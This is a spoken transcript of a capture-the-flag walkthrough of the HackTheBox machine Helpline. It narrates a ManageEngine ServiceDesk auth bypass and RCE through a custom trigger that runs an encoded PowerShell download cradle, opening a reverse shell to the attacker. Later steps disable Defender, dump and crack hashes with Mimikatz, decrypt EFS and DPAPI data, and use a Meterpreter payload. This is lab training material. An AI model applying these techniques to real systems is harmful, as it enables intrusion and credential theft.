What's going on YouTube? This is Ipsec, and we're doing Helpline from HackTheBox, which was a relatively difficult box with multiple ways through it. Unfortunately, I ran out of time and can only show you one way. That way will be getting RCE on ManageEngine, landing on the server as system, and then using Mimikatz to decrypt the encrypted file system for the user flag, and then the administrator flag is gotten through using Meterpreter, or you can also do Mimikatz with encrypted file system. So with that being said, let's just jump in. As always, we start with the nmap, so -sc for default scripts, sv, enumerate versions, OA, output all formats, put in the nmap directory and call it helpline, and then the IP address, which is 10.10.10.132. Can take some time to run, so I've already ran it. Looking at the results, we have a few ports open. The first thing we have is a remote procedural call on 135. That's not too interesting. SMB on port 445. And then we have a web server on port 8080. Scrolling down, it looks like that is it for the port requests. We do have a... That's not a SSL certificate, that's just nmap not knowing exactly what it is. There is a clock skew of 7 minutes, and we have a message signing enabled but not required, and that's about it. So the first thing I'm going to do is a SMB map, just see if there's any shares open. 10.10.10.132 is the host. We get access denied, specify anonymous, and we get access denied as well. So if we get any other credentials, I may try it against that. But for now, let's just go do 10.10.10.132, port 8080. And we get a ManageEngine Service Desk Plus. And looking at the bottom right, we have 9.3, which is the version. And we also have a copyright of 2019. So it probably means this application was updated recently, unless this is generated dynamically, meaning whenever the web page is loaded, it just puts that year in. If you ever see in a copyright of like 2014, you know there's probably going to be something there because it's so out of date. But if you see the current year, you can't really confirm it's out of date, but you can't confirm it's up to date because it could be a few months out of date. And additionally, this could just be dynamically generated. So the first thing I'm going to do is just let's check out Searchsploit, ManageEngine, Service Desk, and we see a whole slew of things. So we can just ignore all these like 8 to 9.2s, because we know the application is 9.3. So we have privilege escalation. Generally this needs an account, so I'm not going to check this out. We do have user enumeration, and if you looked at this, it's a bit wordy, so I'm not going to read it. Instead, we'll just go and reproduce it. So going over to FireFox, go to Foxy Proxy, set it to intercept. That's on default. There we go. Click log in with admin, and then put a password of anything. I'm putting please subscribe. Make sure BurpSuite proxy is on intercept. Click login. And we get this. So we're sending a post request to admin. Please subscribe. That's not the first post request. I think I accidentally hit enter here, and that's why I saw something there. So let's click login again and see what it sends. Or I can just go to this history. So this is the very first request. It searches this, and then it sends a request to JSecurity check with the actual password. But if we just sent this to repeater, we see it's doing a search against local auth domain, puts the timestamp, and then the username. User's null. If we do like administrator, we get a not a domain. So if you wanted to, you could now just copy this and send this over to wfuzz to enumerate other users. So you could do like wfuzz-w for word list, user share sec list, usernames. We'll do top username short list, -u for URL, HTTP, 10.10.10.132.80.80, and then paste, and then search equals capital fuzz. And we'll probably have to put this in single quotes. And we can see right off the bat that there's 2 that has 13 characters or 3 words, guest or administrator. Additionally, if you went into Google and just Googled like ManageEngine service desk default username, you'll probably see the default username is administrator. There we go. Default set of credentials, administrator, administrator. So that's going to be the first thing I try. So let's turn intercept back to off. Go to FireFox. Try administrator, administrator. Tell this to never save. And this application is relatively slow, so this may be choppy as I speed it up. So administrator didn't work, but looking at the wfuzz results, we also had a guest account. So I'll try guest, try to log in, and we get in. So now the way we should do this box, or the intended solution, is going over into the Solutions tab, and then you'll look at this help desk and see down here we have Luis Rubio at administrator, and just looking at the help desk created by Luis, those are the ones I think created by the box creator. We see some things, so there's one that just said Megabank. Oh, right here. So I think this is a ticket you should read. We can look at this. But going all the way down, we do have a password audit. If you go here, you can download the results. And then there's a hidden sheet in this document that just has some credentials. Unfortunately, it is late in the afternoon on Friday, and this video has to go live tomorrow, so I can't show you all the solutions. This ticket is just saying open remote access.megabank.com and enter credentials. But if you remembered, going back to the Searchsploit, let's just type it again, ManageEngine service desk. There was a privilege escalation one, so we'll check this out. So Searchsploit-X, view it anyways, and we see this is just a Python script. So I'm going to do Searchsploit-M to mirror, and then we'll open this up in Vim to see the script. So this is a Python script, and going through it, it's pretty hard to read. It's not documented too well, and it's doing HTTP request a bit weird, creating the curl command manually and then executing via popen. So let's see if we can find any information on this. So I'm going to grep the CVE out of this, and we're just going to go to Google and figure it out. So if we Google this CVE, there is a GitHub page, and scrolling down, looks like there's more info at this URL. Going here, though, returns A404. So I'm going to go to archive.org, and we're going to search to see if we have that in here. Was I supposed to do the search up top here, the Wayback Machine? And doesn't seem to have the page archived. So we're going to try another way to pull old pages. Go to Google, type cache : and then the URL, and we can get to this. So it's not that good of documentation. You get the page and gives you a JSession token. Get a home page, go to MC, which is the mobile console, and it gives you a third JSession ID. You log out, and then it gets the page again, and you send it different cookies, and since you have one authenticated cookie, it just magically authenticates you with no password. So let's try stepping through that, and maybe it'll make more sense. This is a exploit. I don't fully understand why it works, but I'm guessing it's just one of the cookies is resolving to a null user. So let's just step through this and send the exploit through burp. So cherry tree, I'm sure there's probably hotkeys to tile my window with 4 windows, but we'll do it manually. So the very first thing we're going to have to do is get the Python script to go through a proxy. And since that's using curl, I'm just going to edit my .curl RC file in my home directory, put proxy equals http 127.0.0.1:8080. So now if I do curl 10.10.10.132.8080, turn intercept on, click go, we see it sends a request. So let's now run the, before we run the exploit, we have to change localhost to be an IP address. So 10.10.10.10.132, the IP of Helpline. And now we should be able to run the exploit. Non-ASCII character on line 5. Go to line 5. It looks like it's this character, so we'll just, there's a few. We'll just delete the line. And then if we go to run the script with burp on, we will see the intercepted request. The very first thing we do is we do get slash, which is right here. And I forgot one last thing. Let's make sure we have intercept server request on. I just clicked on options there. And then now when we click forward, we can see the response of it saying set header cookie. So JSession ID 0 is most likely this guy. So let's just put this and document initial/request. And we can forward this along. And now we're doing a post on JSecurityCheck with this JSession ID and the username guest. So click forward. And it returns us a cookie again. Oh no, we're doing a get request on slash. So we post it here, doesn't send us anything. We send another request to slash. And this is when it should respond with our JSession single sign-on cookie according to this. So I can just put JSession SSO, which is important, so we can grab this. And then it also sent another JSession ID. This one's unique. This is probably authenticated to guest. Click forward. And that says captured authenticated cookie, 1D8 and 0C. So we just log those. This is the guest authenticated, and that's single sign-on. And now we're doing a GET request to /MC, which is their mobile console. And it is telling us it's moved and gave us another JSession cookie. So this is probably guest to /MC. And in their documentation, this is JSession 2. So click forward. Now we're doing the magic step 1. So we're sending 2 JSession IDs along with our single sign-on. So the single sign-on is going to be static the whole time, but we're sending it the guest to /MC plus our initial authenticated to the non-mobile console. Click forward. It tells us okay. Now we're going to get the dashboard. And again, doing the same 2 cookies. Click forward. And now it's going to return us new cookies. The single sign-on doesn't look like it changed, but we get a new one. So this is MC after logout. And we are right here in their documentation, JSession 3. So we're doing a get slash with 5ED, which is the previous guest to /MC. and then 1D, which is our initial authenticated to guest, and then the single sign-on. And it's going to respond back with yet another one. This is from /. So now the application is probably going to try to log in, since this JSecurityCheck is a login page. So we do here, we're making a post request to JSecurityCheck and sending it the JSession ID from the mobile console and / with administrator and a password we can put of anything. So we can put please subscribe and click forward. It will return us JSession ID number 5, which will be authenticated. And if you don't understand what's going on, I don't either. I have no idea. My guess is, I forgot to copy it down. But my guess is when you visit / it just gives you a generic JSession. This one doesn't matter. So we can get rid of that. So, whoops, we need to put H here. Click forward. So when we authenticate to guest, we got this token that says we're authenticated, and we're going to JSession single sign-on. Then we're going to make a request over to the mobile console. We get yet another token. When we do this logout, I'm guessing it nulls out authenticated to guest at /, but this token remains logged in. In order to do a login, though, you need a cookie from the root. So we just go here, get this, which is an unauthenticated one, and then we make our final post request with a cookie that says we're authenticated. So this cookie says authenticated, no user info. Then this cookie has no user info. And then the JSession single sign-on, I don't know if this cares, but it says authenticated. And then no user info. So the application sees this on a login, and when we try to log in with the administrator user, it goes, oh, you're authenticated, so I'm just going to let you in, and now that becomes your magic cookie. So hopefully that's how it works. You can dig more into that, but it seems to be pretty complicated with how little it's documented and without the source code to ManageEngine. Of course, we could just go pull it and analyze it, but that's a lot of work. So it just wants us to replace our cookies. So if we go over here into authenticated session, I'm going to hit Alt Tools Web Developer, and we're going to go to Network and then click Storage, and we can just replace our cookies here. So the very first one, we don't want to edit this /custom one. I don't think we have to at all. But we want to grab this JSession, copy, go here, paste, and then the single sign-on one is up here. So we just copy this. Actually, before I do that, I'm going to refresh the page. So we're guest. Does single sign-on matter? So I just refreshed, and we are still guest. So I think single sign-on does matter. So I'm going to put this cookie there, and then I'm also going to make sure we have this cookie. And if this doesn't work, we'll just rerun the exploit again, because that would mean by testing that thing out, I had killed my cookie. So then it doesn't look like kill my cookie, because now the page has changed and I have a link to admin. So with this, like most help desk applications, there's plenty of ways to get code execution. I'm just going to click on the admin tab, do custom triggers, and then we can set up a trigger. And it looks like there's one already here. So I'm going to go revert the box so we have a clean work area. So the box has been reverted, so we don't have a custom trigger. We can add one. And then we want the action name. And the first one, we're just going to use ping because all we want to do is test this out. So we can see the action will be executed when a request is created. And then for the match below criteria, we'll say when the sender is not, please subscribe. If I can type correctly. And this is just going to always match because we're never going to put the sender as please subscribe. Then we can do execute the script, cmd/c, ping 10.10.14.3. And we also want to specify -n1 for count. And before we ping, we want to do tcp dump -i ton0 icmp. So we can save the script, then open a request and create a new request. So we can do new incident, and we can do the name, ping, and the subject, RCE test. And then add the request. And if you're doing this on an actual engagement, chances are you would probably change this to be instead of when request is created, maybe do edit or find a different path in ManageEngine that's not so noisy because you're not going to want to create a request for every time you execute code. We see that has finished. Going back to a window, we can see 10.10.10.132 has pinged us. So now to test actual code execution and running PowerShell. So I'm going to make dir dub, and then we're going to copy opt Nishang shells, then PowerShell or invoke PowerShell tcp.ps1, and we'll just call it shell.ps1, and then edit this. We want to grab the reverse shell, and then we will do the IP address of 10.10.14.3 and the port of 9001. So let's listen on 9001 and also start a web server, simple HTTP server 80. And then one other thing I always like doing when dealing with web applications is minimizing the types of characters I send it. So I'm going to do echo ix new object net.web client download string http 10.10.14.3/shell.ps1. Do this in double quotes here. Okay. And then to get this in a PowerShell format that PowerShell wants, we have to convert this to format UTF-16 little endian. And if we do XXD now, we can just see what it looks like. If we got rid of the iConvert, we can see what it looks like. So Windows likes things looking like this, or at least PowerShell does. So base64-W0, and I'm also going to do -n because we don't need that carriage return at the end. So we can copy this command. I'm just going to eyeball this real quick. IX, new object, net.web client, download string. Yep, that looks good. I want to make sure I copy both of those equals. Go to FireFox, and let's edit this to be shell. And then we can try cmd/c, PowerShell-NOP for no profile, -ENC for encoded command, and then paste the base64, save, and then if we do request, new incident, we can put the name as PowerShell and the subject as rev shell, and then add the new request. And it'll probably take a good 45-60 seconds because the application is relatively slow for that to go through. But we should see a GET request on port 80 and then a shell return. And I realized I made a mistake when I was showing this off. We had this XXD in here. Still, we don't want to have that. And the base64 command is much smaller. So let's try this one. So copy this, go here, edit this, and the encoded command, paste, save, and then we can do request, new incident, and we can do rev2. You can say second attempt, rev shell, add the request, okay. So hopefully now in 45 seconds we get a callback. There we go. Called back on 80, and we have a shell. If we do who am I, we see we're an NT authority system. So if we went to C:, went to users administrator desktop, and then tried to get root.txt, we will see, oh, we can, but if we type it, we get an error message. The access to path is denied. So there's definitely an issue with that. If we do cipher/c root.txt, we can see only the user that can decrypt it is helpline/administrator. So this is using encrypted file system, which is built-in encryption in Windows. And we can also go up to directories, do GCI for get-childitem, recurse dot, and select FullName. If I can spell GCI-recurse dot, select FullName. And we can search for like user.txt. See, that's in cd/users Tolu desktop. Do dir and try typing this, user.txt. We get an issue. So we can do cipher/c user.txt and see only Helpline can decrypt it. So what we have to do is use Mimikatz to build a certificate so we can view this, or switch to the Tolu user. So if we did task list, maybe task list/v, and then just went up, whoops, go up, we can see process by Leo, nothing by Tolu. So we can't just go into Tolu's process space and execute it. The other thing we can't do is decrypt this with an NTLM hash because the machine is not domain joined. On encrypted file systems on a domain joined machine, you should be able to use the NTLM hash as a secret, but if it's not domain joined, you're stuck with only using the SHA-SUM or the actual plaintext password. The reason for that is Microsoft doesn't want to put the password for encrypted file system in the SAM database, and NTLM hashes for domain users are not in the local SAM database of the machine. So with all that being said, we're kind of stuck because we have to find a way to get the plaintext password of Tolu. And since we're doing the box in an unintended route, we kind of miss hints. So what I'm going to do is go back into E, and we're just going to drop Mimikatz and do cracking NTLM passwords, because that's something that you should always be doing. So if we just go to Mimikatz GitHub and then go to releases, we can download the latest one, Mimikatz trunk, save, and then go into www, move, downloads, Mimikatz here, 7-zip extract, Mimikatz, and then move x64, mimikatz.exe. And if we invoke web request -URI HTTP 10.10.14.3 mimikatz.exe -out file mimikatz.exe. See if we can download it. So we see our web server, it started downloading. And are we going to get a shell back? Is it still going? I'm going to try typing who am I, see if we get any response back. We don't. So either the server's going slow or something just killed our process. So it's probably been about a minute now. So I'm just going to name this window temp, go into 2, and we're going to do nclvmp 9001 and get another shell in this box. So we can just create a new incident. So new incident. Just give it junk. Add request. And get another shell on this box. And with this shell, I'm going to disable Windows Defender. Maybe that stopped it. And when it killed the download, maybe it also killed my shell without telling me. Oh, we finally got a response back. So if I do who am I, looks like everything is good. If I do dir, we got Mimikatz there. I'm going to try to execute it. And we'll do exit right after it. Fail to run because the file contains a virus or unwanted software. So I'm going to disable Defender, or we could just produce a Mimikatz that Defender doesn't do. There's a video on my channel, but for this video, we'll just disable Defender instead of bypassing it. So now if I do /mimikatz.exe, exit, it should run and then stop it. I'm also going to do task list /v here because this box has started going slow. Okay. So there we go. So we can do mimikatz.exe, token, elevate, then we need LSA dump, SAM, and then it's always good to put an exit at the end. So this will give us the NTLM hashes of all the users. And it looks like we're probably missing one up here, which is the administrator. So I'm going to grab all this output, v NTLM, paste. And then we want to grep NTLM on this file, and then awk print. And that's 1, 2, 3, 3 spaces. And we have all the hashes. So I'm just going to go into my cracking rig. You could just search this on hashes.org and potentially do that. Actually, let's do it that way. Hashes.org instead of using hashcat. Hash. I think it's search or check. Nope, right here. And then TT, Q, V, Y, and Z. Submit. We got one cracked, and it's EEF285. So if we go back and look at this, EEF, that is the Zachary user. So we got Zach's password. So what I'm going to do is net user Zachary and see what he can do. He is a member of the event log readers group. So maybe we're supposed to be looking into the event log. And the best way to process that is the GitHub page, I think Rambling Cookie Monster. There we go. And there's some good PowerShell event log stuff in here. So if we do get-event, or what is it? Event data. Is this the only one? Let's see. No, we want when event and event data. So copy this. Shoot. Control-Shift-V. Did not copy. I don't think. 3 cd www v event.ps1 set mode to paste. We can paste that in, and then let's also get when event. Get when event data, and we want. I wonder if get-when event is just a default PowerShell. See, no events match. So, okay, that's default PowerShell. So we can just do ix new object net.web client download string http 10.10.14.3, and then we called it event.ps1. Okay. So now we should have get-win event data. So we'll do get-win event filter hash table at log name security. And then how else does he do this? I'm getting it from filter hash here. So he's doing 4740, which I believe is lockout events on domain controller, and that's not going to be what we want. So if we do like Windows event code 4740, I'm just trying to find the URL, ultimate Windows security. I'm going to search this one specifically for command line process logging. And let's see, we want to do, I think 4688 is it. A new process has been created. So you could just search through the win event log. You could do a command to export them all through a file and then do it manually. But there should be ones you just know to search for and do it that way. So we're searching for event ID 4688. And we can say get win event data, and we should have put this to a variable. So let's copy this and say x is equal to that. And that's going to fail because I don't have the a on that. So x is equal to that. And now that that's done, we can look at x. It's not printing anything. Let's do x dot ft like that. Right host x. So it looks like something screwed up with my standard in, standard out, I believe. So let's try this dash. Is there a max events? Events 1, get win event data. I'll just type it. And we'll do format list stir. So we can see all the things here. And we have, let's see, we wanted command line. So there's a variable e_command line. So let's do this again. Pipe it to a new window because I don't want this new line. So copy, paste, and we want get-win event data. And then we want select or do ft e_command. What is it? I'm just going to type it out again. We want command line. e_command line. It not being in the X variable is really screwing me up. And I think that's purely because of Nishang. So I'm going to type it out in cherry tree. Okay. So we want 46 4688 here. We don't want max events. And we want F, or select will probably be fine. E, is it just command line? Or is it process command line? Just command line. So let's try this command. Get win event. We don't want computer name. And we don't want that 10. Because that was from max events. Paste. And we're getting a bunch of things, but it looks like they are truncated. So I'll do, I think, format T table, dash auto size, and dash wrap. Here we go. So we can look at all this command line logging on the Windows box. And eventually we will find a net.exe, help desk, user Tolu, and here's a password. So we could quickly validate the password with smb map -u tolu -p, the password -h 101010 132. And we see it is a valid user. There is a help desk stats directory. I actually don't know what's in that. We can do recurse to see what's in it. A stats XML. But with that password, now we can use Mimikatz to decrypt the EFS. So let's just do that. So I can't clear. So let's do Google Mimikatz decrypt EFS. And let's put Tolu's password here. So how to decrypt EFS files. So the first thing we want to do is that cipher command. So we can do cipher /c users Tolu desktop user.txt. And we can see the certificate thumbprint is this. So go to cherry tree, EFS, we'll just do new thing, EFS, Tolu user.txt, thumbprint is this. So that's going to be important because this tells us what certificate can decrypt it. So if we go back into here, let's see, he wants us to grab the app data roaming Microsoft system certificates, my certificates, and then this piece, I believe, is the thumbprint. So let's go C:/CD ... So we're in C:/ users Tolu, go in app data, roaming, and then we want Microsoft certificates like this, CD this, PWD, okay. So go back to E where Mimikatz is, /mimikatz.exe. We want to do, I think sec URL SA CAPI. Is this the first one? Crypto system. So we'll do crypto system. And then space /file. Specify this. And I forgot to do a dir on that. It should be fine. We can do it here. In our other shell. So dir C:. Already had the C there. C:. cd users Tolu app data roaming Microsoft system certificates cd my cd certificates, and then this. And you'll notice this one is the same as the thumbprint. So 91EF ends with 29. So was it certificates or certificate? Certificates. Put that there. And that. Go back to FireFox to look at the command. Crypto system, file, and we need /export. And then we want exit. It's not recommend the name. dir? I thought Mimikatz was here. Let's download it again. URI 10.10.14.3/mimikatz.exe -out file mimikatz.exe. Maybe something periodically cleans this out. And I don't think that's going to copy correctly. Well, it looks like it did. There we go. So we saved it to .der. So if we do dir, we have this file, and we want to copy this file to our box. So I'm going to do SMB server. If you don't have that, you probably have like mpacket-SMB server. We can do -SMB2 support, -user test, -password test. Those are just made up. And then the share name, we'll call it test. And then location, pwd. Before I do that, make dir SMB. And then we can do this. Okay, it has now started. So we can net use z:10.10.14.3/test/user test, and then type the password as test. Now we should be able to copy this file to z:, and if we go into SMB, we have the file. So the next file it wants us to grab, following these instructions, is the private key. So we can do dpappy master key, and this one is in the protect folder, and this is the SID of the user. So if we go back to this, cd protect dir cd the SID, and then if we do gci-hidden, we can get this thing. So we can copy this, go back to cherry tree, we'll do that / this. Okay. And the command we want to run is dpappy master key. So paste /n. I don't like that it's a different color. dpappy master key. And there's no special characters there, so I'm not going to quote that. The next thing we want is /password. So /password. And then Tolu's password was up here. If we grab this, paste, and then do exit. The last thing I'm going to do is get rid of that. If you had noticed, the quotation mark keeps doing some type of weird encoding that I don't want. There we go. It turns like into slanted quotation marks, if that makes sense. We need /mimikatz.exe. Was it just /n? I think there's a file. Nope, /n. If we do this correctly, which we did not. Let's see. Mimikatz, deep happy master key. So we want to put that in this quote. There we go. See if this works. There we go. And Mimikatz is weird. Like, this is a command, and then these are arguments to the command. If that quote is outside, then it registers this as a command and then this as a command. So every command you want to put it in quotes. So that's what I'm doing. And we have the master key extracted. So we can go up here, master key here. So if we go down, it now wants us to grab something out of the RSA directory. So we can go into the RSA. What is it? Microsoft Crypto RSA. Crypto RSA. Go into the SID. And then it wants us to grab this file. So we'll just copy star to, wait, are we doing anything against this file? I think we are. Yeah. Let me just copy this whole command. Paste. So we'll do deep happy capi in c:. Go back here. Wait, it got c:. So copy this. And then backslash. We want the next piece, which is this. Okay. And then it wants /master key. And we paste that over here. Okay, put this all in quotes. /mimikatz.exe. And hope this is all good. We want to do it in this one. We'll have Mimikatz. Run this. And I think we have an error. I'm looking at /n:/c. And I don't have exit. So you can see our Mimikatz is hung. We should be able to go task list /v, find string, mimi, and then task list /kill /im mimikatz.exe. Maybe that'll work. Task list, task kill /im mimikatz.exe. Task kill /im mimikatz.exe. Task kill /f for force mimikatz.exe. There we go. Process has been terminated. And now it's spamming standard out. There we go. So let's go back here. So now you know what happens if you forget the exit. And we want to get rid of that C, or /. Okay, paste. There we go. You can see how quick it ran, and it gave us a new file, this raw exchange. So we can copy this to Z, copy this to Z:\\. There we go. And then if we look in our SMB directory, we have those two files. So going back here, it'll give us OpenSSL commands. So it does OpenSSL x509 inform dir out for pem, and then we do -out public.pem. So 91 -out public.pem. Then the next one with this raw, and then this will probably be -out private.pem. Yep. So now we got public and private, and we need to create a key. And the password says Mimikatz here, and cert.pfx. Okay. And now it says you can install it with certutil-user-p Mimikatz, import pfx, certpfx, no chain, no root. So let's try this. Go here. Go into Z, paste, completed successfully. So now if we go into Tolu, desktop, and do, I think this will work. File is equal to GC for get content, user.txt. I'm just trying not to show the flag. So let's do that. And then file.substring 0 to 615 will be fine. There we go. The first 15 characters of the flag here. We can definitely read that file now after importing the certificate. So now the next thing to do is get the administrative flag. So we have to get the administrative password first. And if we looked back at all the files that were there is a unique file in Leo. If we go to Leo desktop, and that is admin-pass. But it is also protected by Cypher. So we have to be able to get Leo's encryption key to be able to decrypt this. The easiest way to do this, because when we ran task list/v, we see Leo is actually logged into the box. So we just have to get into a session and then we can decrypt it. So what we're going to do is go run msf venom -p for payload, Windows 64-bit, reverse TCP, interpreter, reverse TCP, lhost 10.10.14.3, lport 9001, format exe, out file msf.exe. And then we just run msfdb run. And this will give us the MSF console window. We can do file msf.exe. It's good. Use exploit multi-handler, set payload, Windows x64, interpreter, reverse TCP, set lhost, ton0, set lport, 9001, run. And go back over here, z:/msf.exe to execute it. And then probably in 10 to 15 seconds, we'll see a callback and start sending stage 2 or stage 1. There we go. Interpreter session 1 has been opened. So we can just do sessions-i1. Oh, I'm already in it. So PS. And let's look for Explorer, just because that's generally a stable process. Running as Leo. So let's actually do this first. So we do shell, cd users leo desktop type what was the file? Type admin-pass.xml. Access is denied. Migrate into the PID. Shell cd users leo desktop type admin-pass.xml, and we can see we can read it now. And this is the output of a secure string in PowerShell. So what I'm going to do is load PowerShell. So now our interpreter extension can just execute PowerShell. I'm going to do PowerShell shell. And we're going to go into that location. We'll do pw is equal to get content admin-pass.xml convert to secure string. We do pw, we see it's system.security.secure-string. So I can do credential is equal to new object system management automation ps credential administrator, and then the password, which is the variable. And then if we do cred get network credential, we can see that, and the password is actually just a hidden variable. So if we do ft for format list star, just like we did before, we can see the administrator's password. So if we do cherry tree, go here, administrator, that. And if we wanted to, we could do the whole encrypted file system thing again to get this, or we can just do this with Invoke-Command. Because if we do Invoke-Command, computer name helpline dash credential cred dash script block, who am I? We'll see that it's actually running as administrator. And this user can automatically decrypt that file. So if we do the same thing, script block file is equal to gc c:, users administrator desktop root.txt, and we want to do file.substring 015. We'll see that it actually errors out. We don't have access to it. So the reason is whenever you do like PowerShell remoting, you have that double hop problem unless you use CredSSP. So we can do, whoops. I don't want to copy the line break. There we go. Dash authentication, CredSSP. Try this. Let's see. Unexpected token. It's weird. I wonder if it copied like HTML and we have a bad character somewhere. Try CredSSP here. Invoke-Command. At least it's taking longer. Maybe it wants script block to be the very last thing. There we go. The first 15 or 16 characters of the hash for administrator. So that is the box. If you guys want to challenge yourself, I'd recommend doing the EFS thing to decrypt the file with the administrator password. But that'll be it. Hope you guys enjoyed the box. Take care. See you all next week.